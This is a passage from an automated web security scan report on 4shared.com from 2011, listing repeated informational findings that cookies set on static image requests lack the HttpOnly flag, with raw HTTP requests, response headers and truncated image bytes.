User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:08:06 GMT; Path=/
Set-Cookie: hostid=1033795789; Expires=Mon, 26-Jul-2021 14:08:06 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:06 GMT
ETag: W/"1117-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 1117
Date: Fri, 29 Jul 2011 14:08:05 GMT

GIF89a.......~.......z{~stwjkncdf...8G.ES.............Xd................IHH...............jv.......x..337Z[]...qrur}.NOQfgi}~.......uvx...z{}al.~....vxz...{|M[.ku.mnqyz}|..QRUnpr|}....STX...]^`|}.
...[SNIP]...

6.67. http://www.4shared.com/images/feat1mus.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/feat1mus.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/feat1mus.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:07:56 GMT; Path=/
Set-Cookie: hostid=-1895159666; Expires=Mon, 26-Jul-2021 14:07:56 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:07:56 GMT
ETag: W/"1121-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 1121
Date: Fri, 29 Jul 2011 14:07:55 GMT

GIF89a.......~.......z{~stwjkncdf...GU............................Ye.........................ht....x..Z[]4C.......qrt...fgiNOQP]....r}.<K.}~.z{}tux`l..........~.{|ku.mnqPQU...yz||}.opr...?N.wxzhik]
...[SNIP]...

6.68. http://www.4shared.com/images/feat2doc.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/feat2doc.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/feat2doc.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:08:06 GMT; Path=/
Set-Cookie: hostid=27019734; Expires=Mon, 26-Jul-2021 14:08:06 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:06 GMT
ETag: W/"1361-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 1361
Date: Fri, 29 Jul 2011 14:08:06 GMT

GIF89a..-.......stwz{~jkn...cdfhik}sg...vwy.{m.wx...~............u..w|stRSV.........}p`?N....tdLrsu......z}.L<)efi.t]..
~..
.....KM]......`ad..._bumnp...H;*WX[...ghj.....    ..ropr.....|qt.vy.....}m.
...[SNIP]...

6.69. http://www.4shared.com/images/feat3.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/feat3.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/feat3.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:07:57 GMT; Path=/
Set-Cookie: hostid=522532646; Expires=Mon, 26-Jul-2021 14:07:57 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:07:57 GMT
ETag: W/"798-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 798
Date: Fri, 29 Jul 2011 14:07:57 GMT

GIF89a..-.........cdfjknz{~...stw.........vwy.........~.......efimnp......ghj......WX[.........`ad...............{|~xy{UVZ...~~.TUX...bcf.........\]`...ppsRSWYZ^...............hil......kknZZ^...opr^
...[SNIP]...

6.70. http://www.4shared.com/images/feat3doc.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/feat3doc.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/feat3doc.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:08:07 GMT; Path=/
Set-Cookie: hostid=-1643524810; Expires=Mon, 26-Jul-2021 14:08:07 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:07 GMT
ETag: W/"782-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 782
Date: Fri, 29 Jul 2011 14:08:06 GMT

GIF89a..-.........cdfjknstwz{~...............QRU.vk\]`......UVY............YZ]vVG.T=...~..gY`ad............WX[...efivwymnq.....................rsu...ghj.........xy{.........opr.M8.........{|~...pqs.
...[SNIP]...

6.71. http://www.4shared.com/images/feat4.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/feat4.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/feat4.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:07:57 GMT; Path=/
Set-Cookie: hostid=2032790688; Expires=Mon, 26-Jul-2021 14:07:57 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:07:57 GMT
ETag: W/"1677-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 1677
Date: Fri, 29 Jul 2011 14:07:57 GMT

GIF89a.......~.......z{~cdfjknstw.......................NOSghj......mnq[\^rsuQRU{|~~....}~.......XY]abe......yz|...rsv......uvxefi......JKM...kln|}..........ops......ijm...xy{...............|}....
...[SNIP]...

6.72. http://www.4shared.com/images/featbg1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/featbg1.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/featbg1.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:08:17 GMT; Path=/
Set-Cookie: hostid=-973451449; Expires=Mon, 26-Jul-2021 14:08:17 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:17 GMT
ETag: W/"269-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 269
Date: Fri, 29 Jul 2011 14:08:16 GMT

GIF89a..-....~..........1@....O^.:I.MZ....BQ.......ny....u.....Sa.bo.jv.Xe.IW.^k....2B.r|./>.7G.......[h.......?O.<K.FT.......y..}..5E....fr...........................................................
...[SNIP]...

6.73. http://www.4shared.com/images/featbg2mus.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/featbg2mus.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/featbg2mus.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:08:18 GMT; Path=/
Set-Cookie: hostid=-1161910901; Expires=Mon, 26-Jul-2021 14:08:18 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:18 GMT
ETag: W/"1574-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 1574
Date: Fri, 29 Jul 2011 14:08:18 GMT

GIF89a..-....~....vvx...mnp...efixy{...RSW^_b`adssv~~.......pqs...jkn...TUY............\]`......cdgVVZ......XX\YZ^...WX[{{~...hhkUWZ...{|~ccg......ZZ^...............hil......QRU[]`......SUX...QRV....
...[SNIP]...

6.74. http://www.4shared.com/images/featimg1doc.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/featimg1doc.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/featimg1doc.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:08:06 GMT; Path=/
Set-Cookie: hostid=-902995665; Expires=Mon, 26-Jul-2021 14:08:06 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:06 GMT
ETag: W/"1358-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 1358
Date: Fri, 29 Jul 2011 14:08:05 GMT

GIF89a+.-.............CQ....dj.QWX...RWv...]f.......eh{...*4k-9yaj.W]....?EF:I....7=_<Ds]`u...GKjjs....IQ.nr.377r}..........~.0@..../?.r{.bn.]b.y..{.............'..3B....5D.dn.EMw3>x..._k....2@.7F.f
...[SNIP]...

6.75. http://www.4shared.com/images/featimg1mus.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/featimg1mus.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/featimg1mus.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:07:56 GMT; Path=/
Set-Cookie: hostid=2011318993; Expires=Mon, 26-Jul-2021 14:07:56 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:07:56 GMT
ETag: W/"2345-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 2345
Date: Fri, 29 Jul 2011 14:07:56 GMT

GIF89a+.-.......VZw?M.^`r...LRw.........Vb.......x}.Wb....di.....:w......LT.......CKx9CxRTd...qw....U]....FI^...lq.3>ynz....4<i......17[...am................5D.........................bj..........[]nw
...[SNIP]...

6.76. http://www.4shared.com/images/featimg2doc.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/featimg2doc.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/featimg2doc.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:08:06 GMT; Path=/
Set-Cookie: hostid=772522528; Expires=Mon, 26-Jul-2021 14:08:06 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:06 GMT
ETag: W/"1276-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 1276
Date: Fri, 29 Jul 2011 14:08:06 GMT

GIF89a&.-....rsu,.:...~.......iilJKR08H...nnq......vvzfgj.................TUYabe...XY\...OPT...VWZ...QRV...RSW...Z[^...\]`zz|...........^_c...HHNcdg......kko..................}}......TTZPRZ......}
...[SNIP]...

6.77. http://www.4shared.com/images/featimg3doc.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/featimg3doc.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/featimg3doc.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:08:07 GMT; Path=/
Set-Cookie: hostid=274028166; Expires=Mon, 26-Jul-2021 14:08:07 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:07 GMT
ETag: W/"1370-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 1370
Date: Fri, 29 Jul 2011 14:08:07 GMT

GIF89a+.-.......~.eej...BCFmmqDEHabe......iilLMQ...IJMvvyRSW.........OPTQRV......TUY.........qrt......VWZ...XY\...............Z[^yz|^_c..................\]`............cdg............}}klottw.....V
...[SNIP]...

6.78. http://www.4shared.com/images/featimg4doc.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/featimg4doc.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/featimg4doc.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:08:08 GMT; Path=/
Set-Cookie: hostid=-1080640120; Expires=Mon, 26-Jul-2021 14:08:08 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:08 GMT
ETag: W/"1425-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 1425
Date: Fri, 29 Jul 2011 14:08:07 GMT

GIF89a&.-....noq...qrtzz|......JKMPQU........................ttw||~....................................fgj...TUY\\`..wwziil......}}.........hhl...FGKMNQqrr......JJP...VWZXX]...Z[^...jkn``e\]`xx{...B
...[SNIP]...

6.79. http://www.4shared.com/images/featimg4mus.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/featimg4mus.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/featimg4mus.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:07:57 GMT; Path=/
Set-Cookie: hostid=-1811163653; Expires=Mon, 26-Jul-2021 14:07:57 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:07:57 GMT
ETag: W/"1381-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 1381
Date: Fri, 29 Jul 2011 14:07:56 GMT

GIF89a$.-....~.LMQ...QRV\]aXY\DDI............IIMeei...ABF...iim...qrt.........noq............vwzzz|........................abe......OPTTTY......VWZ...............}}............ttw.........~~.klocdg
...[SNIP]...

6.80. http://www.4shared.com/images/fileSharing.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/fileSharing.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/fileSharing.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:09:52 GMT; Path=/
Set-Cookie: hostid=-1650051724; Expires=Mon, 26-Jul-2021 14:09:52 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:09:52 GMT
ETag: W/"13475-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/jpeg
Content-Length: 13475
Date: Fri, 29 Jul 2011 14:09:51 GMT

......JFIF.....d.d......Ducky.......7......Adobe.d....................
...
.    ..    ..................................##########...............#################################################...........
...[SNIP]...

6.81. http://www.4shared.com/images/fileSharingScheme.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/fileSharingScheme.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/fileSharingScheme.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:09:52 GMT; Path=/
Set-Cookie: hostid=1095631374; Expires=Mon, 26-Jul-2021 14:09:52 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:09:52 GMT
ETag: W/"19921-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 19921
Date: Fri, 29 Jul 2011 14:09:51 GMT

GIF89a............................xxy..iCn.Y.....qt.......RSV...........................&1F~.....LUl......9f.'*/...............Ox......K8D\............."9...............u.D.........]dv?^..............
...[SNIP]...

6.82. http://www.4shared.com/images/fileSharingView.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/fileSharingView.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/fileSharingView.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:09:52 GMT; Path=/
Set-Cookie: hostid=-1147627922; Expires=Mon, 26-Jul-2021 14:09:52 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:09:52 GMT
ETag: W/"7971-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 7971
Date: Fri, 29 Jul 2011 14:09:52 GMT

GIF89a.................w9..]..NOS......~...].X.................[...............`.^......Tj..Q..........-3`....I`..`...........s........... .........88;......,U;......C.X......~?"...]j.JQz.A........
...[SNIP]...

6.83. http://www.4shared.com/images/hborders.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/hborders.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/hborders.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:08:00 GMT; Path=/
Set-Cookie: hostid=-1409556916; Expires=Mon, 26-Jul-2021 14:08:00 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:00 GMT
ETag: W/"1246-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 1246
Date: Fri, 29 Jul 2011 14:08:00 GMT

GIF89a..&....~....qrt...NOS...z{}..z{~Z[]...|}............................stw......rsu...........................efi...fgi...UVXQRV...`adwx{~.deg{|pqsmnq..............~~....fgjUVZjjnklo...TUY[\^g
...[SNIP]...

6.84. http://www.4shared.com/images/icons/16x16/expand.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/icons/16x16/expand.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/16x16/expand.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:07:34 GMT; Path=/
Set-Cookie: hostid=1209208774; Expires=Mon, 26-Jul-2021 14:07:34 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:07:34 GMT
ETag: W/"239-1302522786000"
Last-Modified: Mon, 11 Apr 2011 11:53:06 GMT
Content-Type: image/png
Content-Length: 239
Date: Fri, 29 Jul 2011 14:07:34 GMT

.PNG
.
...IHDR................a....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b...?.%.q..T...\..H....%>>...aA..    ....{..>8].....`......`....4......{7..vF......KKK.............gHHH..3....QQQ........
...[SNIP]...

6.85. http://www.4shared.com/images/icons/16x16/shrink.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/icons/16x16/shrink.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/16x16/shrink.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:09:28 GMT; Path=/
Set-Cookie: hostid=-1253799123; Expires=Mon, 26-Jul-2021 14:09:28 GMT; Path=/
